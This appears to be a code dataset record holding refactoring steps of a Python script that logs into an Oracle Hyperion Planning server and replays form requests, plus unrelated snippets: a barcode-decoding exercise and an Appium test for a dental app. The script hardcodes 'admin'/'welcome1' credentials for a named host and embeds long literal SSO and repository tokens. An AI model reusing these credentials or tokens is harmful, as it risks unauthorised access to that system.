'themeSelection': 'Skyros',\n 'sso_token': s.headers.get('_sso_token')}\n responseRes = s.post(postUrl, data=postData)\n logger.info(f'dyn: 响应header:{responseRes.headers}')\n\n\ndef request_planning_session(plan_name):\n \"\"\"\n \"accessibilityMode\":\t\"false\",\n \"bpm.contentheight\":\t\"621\",\n \"bpm.contentwidth\":\t\"1314\",\n \"bpm.objectpaletteheight\":\t\"648\",\n \"bpm.objectpalettewidth\":\t\"207\",\n \"cluster\":\t\"PLANNING_LWA\",\n \"instance\":\t\"7\",\n \"LOCALE_LANGUAGE\":\t\"zh_CN\",\n \"mru_id\":\t\"PLANNING_LWA_JSTI1:application\",\n \"repository_token\":\t\"59d9b714b22a35fb616dd3c05c5850d56b12522a9561499e9ea22afd918b6d36ea703f19668538504f86305c84f95441a1daf4cac09725703738d5073524871af0489411df16d2bb8f5d4726acdcc389b45e9e6ff00482249c53c1886ca68bfc090fcfbd365243996436f5bbe3affd9c87f6d5e8b7626e59adaeebcc4a89a66ef9725d8d4218c8b0c15912455a2690fcd2391a71806767f05fe66b395dda3e74b75ffa16e80c7814c47657dbc5d652da1044edc74ff20d6e604bdd733542457c3befca52c0700d758445b00ad519d0e8dee43e40cb78e070caca6b7c7a56008b2cbad75e83c7c8454f93177992f9166721331db1e11e48a113a51b3ebc2a79f1d74199127183d7708c47a3ff71663d9d\",\n \"rightToLeft\":\t\"false\",\n \"sourceApp\":\t\"JSTI1\",\n \"sso_token\":\t\"sJIsuVcoOMtHD5CgUaVLmuo4SfCatQy4dowOxaTF0cj1CDqPrPW8YYKvn4nU5rsBYG1yLUChBU/ndO+3pDhwFcRbHJZmaiUOnyFhEh97A5xDXatOpkhIPx4CW+ygHNQlmKrbgUZEmJBgwNT4lcBuDPCZiodPZBo3zCkrSMLQcq0R8qoX6nHvfSVW3ep86WHDyJ859v9OCxcbo4FD4tSv4fTdHGdkGtQaRpdMtuSGtvY2hB+Z7MPEHqkhkIVAt0WWVplND5rUdF5yrLVsywYLWq7I2GH3/UVnwSgsmQy/psjChbnHkzqAcxNg837XRFI1EZBVxaGvdJw6U2mu3qlD29oYi2C/UqwODIjXGtj/st29j6fvd3lJHpsneutkVoG0E/mohFU+JzQaCnopeA+L3A8pORvkfwSyqhURqiLLHS0=\",\n \"themeSelection\":\t\"Skyros\",\n\n\n \"\"\"\n logger.info('planning_session: 开始测试请求')\n postUrl = ('%s/HyperionPlanning/modules/com/hyperion/planning/Adf.jsp' %\n serverUrl)\n postData = {'accessibilityMode': 'false', 'bpm.contentheight': '621',\n 'bpm.contentwidth': '1314', 'bpm.objectpaletteheight': '648',\n 'bpm.objectpalettewidth': '207', 'cluster': 'PLANNING_LWA',\n 'instance': '7', 'LOCALE_LANGUAGE': 'zh_CN', 'mru_id':\n f'PLANNING_LWA_{plan_name}:application', 'repository_token': s.\n cookies.get('ORA_EPMWS_session'), 'rightToLeft': 'false',\n 'sourceApp': plan_name, 'sso_token': s.headers.get('_sso_token'),\n 'themeSelection': 'Skyros'}\n responseRes = s.post(postUrl, data=postData)\n logger.info(f'planning_session: 响应cookie:{responseRes.cookies}')\n s.cookies.set('ORA_HP_MRUApplication', plan_name, path=\n '/HyperionPlanning/', domain=host)\n s.cookies.set('ORA_HP_MRUUsername', s.cookies.get('ORA_EPMWS_User'),\n path='/HyperionPlanning/', domain=host)\n logger.info('当前的header为: ' + str(s.headers))\n logger.info('当前的cookie为: ' + str(s.cookies))\n\n\nimport re\n\n\ndef request_planning_table():\n s.headers['Adf-Ads-Page-Id'] = '2'\n s.headers['Adf-Rich-Message'] = 'true'\n url = (serverUrl +\n '/HyperionPlanning/faces/PlanningCentral?_adf.ctrl-state=9gxaes0ha_55?_adf.ctrl-state='\n )\n response = s.post(url + '14hssan6gi_4', data=\n 'p:r:0:pc1:searchName=&org.apache.myfaces.trinidad.faces.FORM=f1&javax.faces.ViewState=!-9xx6pbfv3&oracle.adf.view.rich.DELTAS=%7Bp%3Ar%3A0%3Apc1%3AformTbl%3D%7BviewportSize%3D27%2Crows%3D33%2CscrollTopRowKey%7Cp%3D0%7D%2Cp%3AformTbl%3D%7BselectedRowKeys%3D0%7D%7D&event=p%3AloadBtn&event.p:loadBtn=%3Cm+xmlns%3D%22http%3A%2F%2Foracle.com%2FrichClient%2Fcomm%22%3E%3Ck+v%3D%22_custom%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22module%22%3E%3Cs%3Eenterdata%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22folderId%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22formId%22%3E%3Cn%3E55532%3C%2Fn%3E%3C%2Fk%3E%3Ck+v%3D%22searchFormName%22%3E%3Cs%3EA0000%E4%B8%BB%E8%A6%81%E6%8C%87%E6%A0%87%E8%A1%A8%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22adhocSessionIdForForm%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22artifactType%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22tlArtifactType%22%2F%3E%3Ck+v%3D%22tlArtifactId%22%2F%3E%3Ck+v%3D%22immediate%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22type%22%3E%3Cs%3EloadModule%3C%2Fs%3E%3C%2Fk%3E%3C%2Fm%3E&oracle.adf.view.rich.PROCESS=p%3AloadBtn'\n )\n logger.info(response.content)\n\n\nif __name__ == '__main__':\n workspaceLogon('admin', 'welcome1')\n request_dyn()\n request_planning_session('JSTI')\n request_planning_table()\n",
"step-5": "#! py -3\n# -*- coding: utf-8 -*-\n\nimport requests\nfrom urllib.parse import quote\nimport logging\nfrom urllib.parse import urlparse\n\nlogger = logging.getLogger(__name__)\n\nlogger = logging.getLogger()\n# 配置日志级别,如果不显示配置,默认为Warning,表示所有warning级别已下的其他level直接被省略,\n# 内部绑定的handler对象也只能接收到warning级别以上的level,你可以理解为总开关\nlogger.setLevel(logging.INFO)\n\nformatter = logging.Formatter(fmt=\"%(asctime)s %(filename)s[line:%(lineno)d]%(levelname)s - %(message)s\",\n datefmt=\"%m/%d/%Y %I:%M:%S %p\") # 创建一个格式化对象\n\nconsole = logging.StreamHandler() # 配置日志输出到控制台\nconsole.setLevel(logging.INFO) # 设置输出到控制台的最低日志级别\nconsole.setFormatter(formatter) # 设置格式\nlogger.addHandler(console)\n\n\n# 后续这些配置项都会移动到一个单独的配置文件\nuserAgent = \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36\"\n# serverUrl = \"http://192.168.60.125:19000/\"\nserverUrl = \"http://epm.huaxinglu72hao.com/\"\nhost = \"epm.huaxinglu72hao.com\"\n# 定义当前会话\n# 会话使用统一的header 和 cookie\n# 下面代码更新header 和 cookie 的使用后续的所有请求都会使用更新后的header 和 cookie\n# 所以下面的函数没有返回值\ns = requests.Session()\ns.headers.update({\"User-Agent\": userAgent})\ns.headers.update({\"Referer\": serverUrl})\ns.headers.update({\"Host\": host})\n\n\n\n\n\n\ndef workspaceLogon(account, password):\n # 登录\n logger.info(\"logon: 开始模拟登录workspace\")\n\n postUrl = \"%sworkspace/logon\" % serverUrl\n postData = {\n \"sso_username\": account,\n \"sso_password\": password,\n }\n try:\n responseRes = s.post(postUrl, data = postData)\n except Exception as e:\n logger.error(e)\n raise RuntimeError(\"登录失败: 网络异常, 请检查服务器地址配置\")\n\n\n\n logger.info(\"登录返回: \" + responseRes.text)\n\n # 无论是否登录成功,状态码一般都是 statusCode = 200\n sso_token = responseRes.text.split('[')[2].split(']')[0]\n assertertoken = responseRes.text.split('[')[6].split(']')[0]\n\n assertertoken_ = {\"ora_epm_ctg\": assertertoken}\n\n updateHeaders(assertertoken_)\n\n token = {\"_sso_token\": sso_token}\n updateHeaders(token)\n\n\n CSRF = responseRes.headers.get(\"X-ORACLE-BPMUI-CSRF\")\n csrf_ = {\"X-ORACLE-BPMUI-CSRF\": CSRF}\n updateHeaders(csrf_)\n\n ECID = responseRes.headers.get(\"X-ORACLE-DMS-ECID\")\n h = {\"X-ORACLE-DMS-ECID\": ECID}\n\n updateHeaders(h)\n\n\ndef updateHeaders(h):\n logger.info(f\"更新请求头: {h}\")\n s.headers.update(h)\n\n\ndef request_dyn():\n\n logger.info (\"dyn: 开始测试请求\")\n postUrl = \"%s/raframework/browse/dyn\" % serverUrl\n postData={\n \"page\": \"/conf/CDSConfig.jsp\",\n \"amp\":\"\",\n \"action\": \"returnXML\",\n \"LOCALE_LANGUAGE\": \"en_US\",\n \"rightToLeft\": \"false\",\n \"accessibilityMode\": \"false\",\n \"themeSelection\": \"Skyros\",\n \"sso_token\": s.headers.get(\"_sso_token\")\n }\n responseRes = s.post(postUrl, data=postData)\n # logger.info(f\"dyn: 响应text:{responseRes.text}\")\n logger.info(f\"dyn: 响应header:{responseRes.headers}\")\n\ndef request_planning_session(plan_name):\n \"\"\"\n \"accessibilityMode\":\t\"false\",\n \"bpm.contentheight\":\t\"621\",\n \"bpm.contentwidth\":\t\"1314\",\n \"bpm.objectpaletteheight\":\t\"648\",\n \"bpm.objectpalettewidth\":\t\"207\",\n \"cluster\":\t\"PLANNING_LWA\",\n \"instance\":\t\"7\",\n \"LOCALE_LANGUAGE\":\t\"zh_CN\",\n \"mru_id\":\t\"PLANNING_LWA_JSTI1:application\",\n \"repository_token\":\t\"59d9b714b22a35fb616dd3c05c5850d56b12522a9561499e9ea22afd918b6d36ea703f19668538504f86305c84f95441a1daf4cac09725703738d5073524871af0489411df16d2bb8f5d4726acdcc389b45e9e6ff00482249c53c1886ca68bfc090fcfbd365243996436f5bbe3affd9c87f6d5e8b7626e59adaeebcc4a89a66ef9725d8d4218c8b0c15912455a2690fcd2391a71806767f05fe66b395dda3e74b75ffa16e80c7814c47657dbc5d652da1044edc74ff20d6e604bdd733542457c3befca52c0700d758445b00ad519d0e8dee43e40cb78e070caca6b7c7a56008b2cbad75e83c7c8454f93177992f9166721331db1e11e48a113a51b3ebc2a79f1d74199127183d7708c47a3ff71663d9d\",\n \"rightToLeft\":\t\"false\",\n \"sourceApp\":\t\"JSTI1\",\n \"sso_token\":\t\"sJIsuVcoOMtHD5CgUaVLmuo4SfCatQy4dowOxaTF0cj1CDqPrPW8YYKvn4nU5rsBYG1yLUChBU/ndO+3pDhwFcRbHJZmaiUOnyFhEh97A5xDXatOpkhIPx4CW+ygHNQlmKrbgUZEmJBgwNT4lcBuDPCZiodPZBo3zCkrSMLQcq0R8qoX6nHvfSVW3ep86WHDyJ859v9OCxcbo4FD4tSv4fTdHGdkGtQaRpdMtuSGtvY2hB+Z7MPEHqkhkIVAt0WWVplND5rUdF5yrLVsywYLWq7I2GH3/UVnwSgsmQy/psjChbnHkzqAcxNg837XRFI1EZBVxaGvdJw6U2mu3qlD29oYi2C/UqwODIjXGtj/st29j6fvd3lJHpsneutkVoG0E/mohFU+JzQaCnopeA+L3A8pORvkfwSyqhURqiLLHS0=\",\n \"themeSelection\":\t\"Skyros\",\n\n\n \"\"\"\n\n\n\n\n logger.info (\"planning_session: 开始测试请求\")\n postUrl = \"%s/HyperionPlanning/modules/com/hyperion/planning/Adf.jsp\" % serverUrl\n postData={\n \"accessibilityMode\": \"false\",\n \"bpm.contentheight\": \"621\",\n \"bpm.contentwidth\": \"1314\",\n \"bpm.objectpaletteheight\": \"648\",\n \"bpm.objectpalettewidth\": \"207\",\n \"cluster\": \"PLANNING_LWA\",\n \"instance\": \"7\",\n \"LOCALE_LANGUAGE\": \"zh_CN\",\n \"mru_id\": f\"PLANNING_LWA_{plan_name}:application\",\n \"repository_token\": s.cookies.get(\"ORA_EPMWS_session\"),\n \"rightToLeft\": \"false\",\n \"sourceApp\": plan_name,\n \"sso_token\": s.headers.get(\"_sso_token\"),\n \"themeSelection\": \"Skyros\",\n }\n responseRes = s.post(postUrl, data=postData)\n # logger.info(f\"dyn: 响应text:{responseRes.text}\")\n logger.info(f\"planning_session: 响应cookie:{responseRes.cookies}\")\n\n # 手动添加两个cookie\n s.cookies.set(\"ORA_HP_MRUApplication\", plan_name, path=\"/HyperionPlanning/\", domain=host)\n s.cookies.set(\"ORA_HP_MRUUsername\", s.cookies.get(\"ORA_EPMWS_User\"), path=\"/HyperionPlanning/\", domain=host)\n\n logger.info(\"当前的header为: \" + str(s.headers))\n logger.info(\"当前的cookie为: \" + str(s.cookies))\n # logger.info(f\"planning_session: 响应:{responseRes.text}\")\n\n# 访问一个具体的表单\nimport re\ndef request_planning_table():\n # 下面的数据都是写死的, 只适用于JSTI->A0000主要指标表\n s.headers[\"Adf-Ads-Page-Id\"] = \"2\"\n s.headers[\"Adf-Rich-Message\"] = \"true\"\n url = serverUrl + \"/HyperionPlanning/faces/PlanningCentral?_adf.ctrl-state=9gxaes0ha_55?_adf.ctrl-state=\"\n response = s.post(url + \"14hssan6gi_4\",\n data=\"p:r:0:pc1:searchName=&org.apache.myfaces.trinidad.faces.FORM=f1&javax.faces.ViewState=!-9xx6pbfv3&oracle.adf.view.rich.DELTAS=%7Bp%3Ar%3A0%3Apc1%3AformTbl%3D%7BviewportSize%3D27%2Crows%3D33%2CscrollTopRowKey%7Cp%3D0%7D%2Cp%3AformTbl%3D%7BselectedRowKeys%3D0%7D%7D&event=p%3AloadBtn&event.p:loadBtn=%3Cm+xmlns%3D%22http%3A%2F%2Foracle.com%2FrichClient%2Fcomm%22%3E%3Ck+v%3D%22_custom%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22module%22%3E%3Cs%3Eenterdata%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22folderId%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22formId%22%3E%3Cn%3E55532%3C%2Fn%3E%3C%2Fk%3E%3Ck+v%3D%22searchFormName%22%3E%3Cs%3EA0000%E4%B8%BB%E8%A6%81%E6%8C%87%E6%A0%87%E8%A1%A8%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22adhocSessionIdForForm%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22artifactType%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22tlArtifactType%22%2F%3E%3Ck+v%3D%22tlArtifactId%22%2F%3E%3Ck+v%3D%22immediate%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22type%22%3E%3Cs%3EloadModule%3C%2Fs%3E%3C%2Fk%3E%3C%2Fm%3E&oracle.adf.view.rich.PROCESS=p%3AloadBtn\")\n\n\n # 从输出的结果看被重定向了\n logger.info(response.content)\n\n # m = re.search(r\"_adf\\.ctrl-state=.+?&\", response.text)\n # current = m.group(0).split(\"=\")[1].replace(\"&\", \"\")\n #\n # response = s.post(url + current,\n # data=\"p:r:0:pc1:searchName=&org.apache.myfaces.trinidad.faces.FORM=f1&javax.faces.ViewState=!-9xx6pbfv3&oracle.adf.view.rich.DELTAS=%7Bp%3Ar%3A0%3Apc1%3AformTbl%3D%7BviewportSize%3D27%2Crows%3D33%2CscrollTopRowKey%7Cp%3D0%7D%2Cp%3AformTbl%3D%7BselectedRowKeys%3D0%7D%7D&event=p%3AloadBtn&event.p:loadBtn=%3Cm+xmlns%3D%22http%3A%2F%2Foracle.com%2FrichClient%2Fcomm%22%3E%3Ck+v%3D%22_custom%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22module%22%3E%3Cs%3Eenterdata%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22folderId%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22formId%22%3E%3Cn%3E55532%3C%2Fn%3E%3C%2Fk%3E%3Ck+v%3D%22searchFormName%22%3E%3Cs%3EA0000%E4%B8%BB%E8%A6%81%E6%8C%87%E6%A0%87%E8%A1%A8%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22adhocSessionIdForForm%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22artifactType%22%3E%3Cs%3E%3C%2Fs%3E%3C%2Fk%3E%3Ck+v%3D%22tlArtifactType%22%2F%3E%3Ck+v%3D%22tlArtifactId%22%2F%3E%3Ck+v%3D%22immediate%22%3E%3Cb%3E1%3C%2Fb%3E%3C%2Fk%3E%3Ck+v%3D%22type%22%3E%3Cs%3EloadModule%3C%2Fs%3E%3C%2Fk%3E%3C%2Fm%3E&oracle.adf.view.rich.PROCESS=p%3AloadBtn\")\n #\n # logger.info(response.content)\nif __name__ == \"__main__\":\n # 从返回结果来看,有登录成功\n workspaceLogon(\"admin\", \"welcome1\")\n request_dyn()\n request_planning_session(\"JSTI\")\n request_planning_table()\n # logger.info(\"sso_token = %s\" % sso_token)\n # logger.info(\"sso_token = %s\" % sso_token)\n # logger.info(\"assertertoken = %s\" % assertertoken)\n # request_dyn(sso_token,assertertoken)\n # requestHSS(\"tYy6FOvH4ZhJR1CUTy83Q9ZJxiNnYbnAt8fjWcMBII4rEmQlYjth+/M4MLIXVuXp7Hi3xQS4+QRySoxvNuFibcGbxbIYRVLFVKogwyhtIAcvtIXMvfhxd8svcLZgIXyTklurCsTarP9KtRgc26B3XRWlDG/QAzVLWyGH26ROffQpUj+bW6yRrj7A0udq1PbqGFXjDZ9iNW0ALbg0Z5NC7g3pBgjtetBohXRmpV32DCw4tI1Y7j7tLnHtSFk/NtdNri5AAFCTqTPd6HYdBzbCDqfP7ZEdfeXJFsfatRE5Pcgqm36hV1U7HeDENhTvNBtZiiQ9OfMdopyHQQvPnBQsyfKzSKTq1O5bSHH9HzQfCJdvq/nkSbalctY2SxIb0vtefJ9fUZ2y4bMAm/g95EZLiKZ5aouVrzOKjt8sl1zVctk+Ivg141wUPqtTULOYdBoi\")\n\n\n",
"step-ids": [
3,
5,
6,
8,
9
]
}
|
[
3,
5,
6,
8,
9
] |
<|reserved_special_token_0|>
def code(N):
code = []
for i in range(N - 4):
for j in range(49, 53):
if S[i][j] == '1':
code = S[i]
return code
def code_s(code):
for x in range(M - 1, 0, -1):
if code[x] == '1':
return code[x - 55:x + 1]
def code_c(code_s):
lists = []
for n in range(8):
for m in range(10):
if code_s[n * 7:(n + 1) * 7] == numbers[m]:
lists.append(m)
return lists
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def code(N):
code = []
for i in range(N - 4):
for j in range(49, 53):
if S[i][j] == '1':
code = S[i]
return code
def code_s(code):
for x in range(M - 1, 0, -1):
if code[x] == '1':
return code[x - 55:x + 1]
def code_c(code_s):
lists = []
for n in range(8):
for m in range(10):
if code_s[n * 7:(n + 1) * 7] == numbers[m]:
lists.append(m)
return lists
for tc in range(T):
N, M = map(int, input().split())
S = [input() for _ in range(N)]
numbers = ['0001101', '0011001', '0010011', '0111101', '0100011',
'0110001', '0101111', '0111011', '0110111', '0001011']
print(f'#{tc + 1}', end=' ')
if not (sum(code_c(code_s(code(N)))[0:7:2]) * 3 + sum(code_c(code_s(
code(N)))[1:8:2])) % 10:
print(sum(code_c(code_s(code(N)))))
else:
print(0)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.stdin = open('sample_input_17.txt', 'r')
T = int(input())
def code(N):
code = []
for i in range(N - 4):
for j in range(49, 53):
if S[i][j] == '1':
code = S[i]
return code
def code_s(code):
for x in range(M - 1, 0, -1):
if code[x] == '1':
return code[x - 55:x + 1]
def code_c(code_s):
lists = []
for n in range(8):
for m in range(10):
if code_s[n * 7:(n + 1) * 7] == numbers[m]:
lists.append(m)
return lists
for tc in range(T):
N, M = map(int, input().split())
S = [input() for _ in range(N)]
numbers = ['0001101', '0011001', '0010011', '0111101', '0100011',
'0110001', '0101111', '0111011', '0110111', '0001011']
print(f'#{tc + 1}', end=' ')
if not (sum(code_c(code_s(code(N)))[0:7:2]) * 3 + sum(code_c(code_s(
code(N)))[1:8:2])) % 10:
print(sum(code_c(code_s(code(N)))))
else:
print(0)
<|reserved_special_token_1|>
import sys
sys.stdin = open('sample_input_17.txt', 'r')
T = int(input())
def code(N):
code = []
for i in range(N - 4):
for j in range(49, 53):
if S[i][j] == '1':
code = S[i]
return code
def code_s(code):
for x in range(M - 1, 0, -1):
if code[x] == '1':
return code[x - 55:x + 1]
def code_c(code_s):
lists = []
for n in range(8):
for m in range(10):
if code_s[n * 7:(n + 1) * 7] == numbers[m]:
lists.append(m)
return lists
for tc in range(T):
N, M = map(int, input().split())
S = [input() for _ in range(N)]
numbers = ['0001101', '0011001', '0010011', '0111101', '0100011',
'0110001', '0101111', '0111011', '0110111', '0001011']
print(f'#{tc + 1}', end=' ')
if not (sum(code_c(code_s(code(N)))[0:7:2]) * 3 + sum(code_c(code_s(
code(N)))[1:8:2])) % 10:
print(sum(code_c(code_s(code(N)))))
else:
print(0)
<|reserved_special_token_1|>
import sys
sys.stdin = open("sample_input_17.txt","r")
T = int(input())
def code(N): # 암호코드가 있는 열의 위치를 찾음
code = []
for i in range(N-4):
for j in range(49,53):
if S[i][j] == "1" :
code = S[i]
return code
def code_s(code): # 암호코드의 행 위치를 찾아 슬라이싱
for x in range(M-1,0,-1):
if code[x] == "1" :
return code[x-55:x+1]
def code_c(code_s) : # 암호코드를 7개의 숫자로 슬라이싱하여 해독 정보와 비교
lists = []
for n in range(8):
for m in range(10):
if code_s[n*7:(n+1)*7] == numbers[m] :
lists.append(m)
return lists # 해독 코드
for tc in range(T):
N,M = map(int,input().split())
S = [input() for _ in range(N)]
numbers = ["0001101","0011001","0010011","0111101","0100011",
"0110001","0101111","0111011","0110111","0001011"]
print(f"#{tc+1}",end=" ")
if not (sum(code_c(code_s(code(N)))[0:7:2])*3+sum(code_c(code_s(code(N)))[1:8:2]))%10 : # 해독코드 10배수인지 확인
print(sum(code_c(code_s(code(N))))) # 10배수면 암호코드의 1을 모두 더함
else : # 아니라면 0
print(0)
|
flexible
|
{
"blob_id": "b739c1de6c008158ee3806bed9fa2865eb484b4f",
"index": 5596,
"step-1": "<mask token>\n\n\ndef code(N):\n code = []\n for i in range(N - 4):\n for j in range(49, 53):\n if S[i][j] == '1':\n code = S[i]\n return code\n\n\ndef code_s(code):\n for x in range(M - 1, 0, -1):\n if code[x] == '1':\n return code[x - 55:x + 1]\n\n\ndef code_c(code_s):\n lists = []\n for n in range(8):\n for m in range(10):\n if code_s[n * 7:(n + 1) * 7] == numbers[m]:\n lists.append(m)\n return lists\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef code(N):\n code = []\n for i in range(N - 4):\n for j in range(49, 53):\n if S[i][j] == '1':\n code = S[i]\n return code\n\n\ndef code_s(code):\n for x in range(M - 1, 0, -1):\n if code[x] == '1':\n return code[x - 55:x + 1]\n\n\ndef code_c(code_s):\n lists = []\n for n in range(8):\n for m in range(10):\n if code_s[n * 7:(n + 1) * 7] == numbers[m]:\n lists.append(m)\n return lists\n\n\nfor tc in range(T):\n N, M = map(int, input().split())\n S = [input() for _ in range(N)]\n numbers = ['0001101', '0011001', '0010011', '0111101', '0100011',\n '0110001', '0101111', '0111011', '0110111', '0001011']\n print(f'#{tc + 1}', end=' ')\n if not (sum(code_c(code_s(code(N)))[0:7:2]) * 3 + sum(code_c(code_s(\n code(N)))[1:8:2])) % 10:\n print(sum(code_c(code_s(code(N)))))\n else:\n print(0)\n",
"step-3": "<mask token>\nsys.stdin = open('sample_input_17.txt', 'r')\nT = int(input())\n\n\ndef code(N):\n code = []\n for i in range(N - 4):\n for j in range(49, 53):\n if S[i][j] == '1':\n code = S[i]\n return code\n\n\ndef code_s(code):\n for x in range(M - 1, 0, -1):\n if code[x] == '1':\n return code[x - 55:x + 1]\n\n\ndef code_c(code_s):\n lists = []\n for n in range(8):\n for m in range(10):\n if code_s[n * 7:(n + 1) * 7] == numbers[m]:\n lists.append(m)\n return lists\n\n\nfor tc in range(T):\n N, M = map(int, input().split())\n S = [input() for _ in range(N)]\n numbers = ['0001101', '0011001', '0010011', '0111101', '0100011',\n '0110001', '0101111', '0111011', '0110111', '0001011']\n print(f'#{tc + 1}', end=' ')\n if not (sum(code_c(code_s(code(N)))[0:7:2]) * 3 + sum(code_c(code_s(\n code(N)))[1:8:2])) % 10:\n print(sum(code_c(code_s(code(N)))))\n else:\n print(0)\n",
"step-4": "import sys\nsys.stdin = open('sample_input_17.txt', 'r')\nT = int(input())\n\n\ndef code(N):\n code = []\n for i in range(N - 4):\n for j in range(49, 53):\n if S[i][j] == '1':\n code = S[i]\n return code\n\n\ndef code_s(code):\n for x in range(M - 1, 0, -1):\n if code[x] == '1':\n return code[x - 55:x + 1]\n\n\ndef code_c(code_s):\n lists = []\n for n in range(8):\n for m in range(10):\n if code_s[n * 7:(n + 1) * 7] == numbers[m]:\n lists.append(m)\n return lists\n\n\nfor tc in range(T):\n N, M = map(int, input().split())\n S = [input() for _ in range(N)]\n numbers = ['0001101', '0011001', '0010011', '0111101', '0100011',\n '0110001', '0101111', '0111011', '0110111', '0001011']\n print(f'#{tc + 1}', end=' ')\n if not (sum(code_c(code_s(code(N)))[0:7:2]) * 3 + sum(code_c(code_s(\n code(N)))[1:8:2])) % 10:\n print(sum(code_c(code_s(code(N)))))\n else:\n print(0)\n",
"step-5": "import sys\nsys.stdin = open(\"sample_input_17.txt\",\"r\")\n\nT = int(input())\n\ndef code(N): # 암호코드가 있는 열의 위치를 찾음\n code = []\n for i in range(N-4):\n for j in range(49,53):\n if S[i][j] == \"1\" :\n code = S[i]\n return code\n\ndef code_s(code): # 암호코드의 행 위치를 찾아 슬라이싱\n for x in range(M-1,0,-1):\n if code[x] == \"1\" :\n return code[x-55:x+1]\n\ndef code_c(code_s) : # 암호코드를 7개의 숫자로 슬라이싱하여 해독 정보와 비교\n lists = []\n for n in range(8):\n for m in range(10):\n if code_s[n*7:(n+1)*7] == numbers[m] :\n lists.append(m) \n return lists # 해독 코드\n\nfor tc in range(T):\n N,M = map(int,input().split())\n S = [input() for _ in range(N)]\n numbers = [\"0001101\",\"0011001\",\"0010011\",\"0111101\",\"0100011\",\n \"0110001\",\"0101111\",\"0111011\",\"0110111\",\"0001011\"]\n\n print(f\"#{tc+1}\",end=\" \")\n if not (sum(code_c(code_s(code(N)))[0:7:2])*3+sum(code_c(code_s(code(N)))[1:8:2]))%10 : # 해독코드 10배수인지 확인\n print(sum(code_c(code_s(code(N))))) # 10배수면 암호코드의 1을 모두 더함\n else : # 아니라면 0\n print(0)\n\n\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import math
def solve():
a = int(input())
b = int(input())
return math.sqrt(a * a + b * b)
print(solve())
|
normal
|
{
"blob_id": "a22d38f7e8122d6339d1beab3bf08fa41c36d61d",
"index": 9648,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef solve():\n a = int(input())\n b = int(input())\n return math.sqrt(a * a + b * b)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef solve():\n a = int(input())\n b = int(input())\n return math.sqrt(a * a + b * b)\n\n\nprint(solve())\n",
"step-4": "import math\n\n\ndef solve():\n a = int(input())\n b = int(input())\n return math.sqrt(a * a + b * b)\n\n\nprint(solve())\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import swipe
def scheduleMultipoint(driver):
driver.find_element_by_id('com.dentist.android:id/calendarBt').click()
driver.find_element_by_id('com.dentist.android:id/addIb').click()
def time(driver):#就诊时间
driver.find_element_by_id('com.dentist.android:id/cureHourLl').click()#就诊时间
driver.find_element_by_name('23:00').click()#时间
driver.find_element_by_name('00').click()#分钟
driver.find_element_by_name('15分钟').click()#时长
driver.find_element_by_name('完成').click()
def data(driver):#就诊日期
driver.find_element_by_id('com.dentist.android:id/cureDayLl').click()#就诊日期
driver.find_element_by_name('完成').click()
def patient(driver):#患者
driver.find_element_by_id('com.dentist.android:id/patientLl').click()
#driver.find_element_by_id('com.dentist.android:id/layout_search').send_keys('总校')
#driver.find_element_by_id('com.dentist.android:id/contactLl').click()
driver.find_element_by_name('总校').click()
driver.find_element_by_name('总校').click()
def site(driver):#就诊地点
driver.find_element_by_id('com.dentist.android:id/moreLocLl').click()#选择就诊地点
driver.find_element_by_id('com.dentist.android:id/select_city_layout').click()
driver.find_element_by_name('北京市').click()
driver.find_element_by_name('返回').click()
driver.find_element_by_name('欢乐口腔(华贸分院)').click()
def project(driver):#治疗项目
driver.find_element_by_name('牙位/治疗项目').click()
driver.find_element_by_name('修复').click()
driver.find_element_by_name('备牙').click()
driver.find_element_by_name('保存').click()
swipe.swipeUp(driver)
driver.find_element_by_name('发起预约').click()
driver.find_element_by_name('继续保存').click()
def subscribe(driver):
patient(driver)
data(driver)
time(driver)
site(driver)
project(driver)
|
normal
|
{
"blob_id": "02bc97b963b970993fc947cfa41c73230dd4d9e4",
"index": 2649,
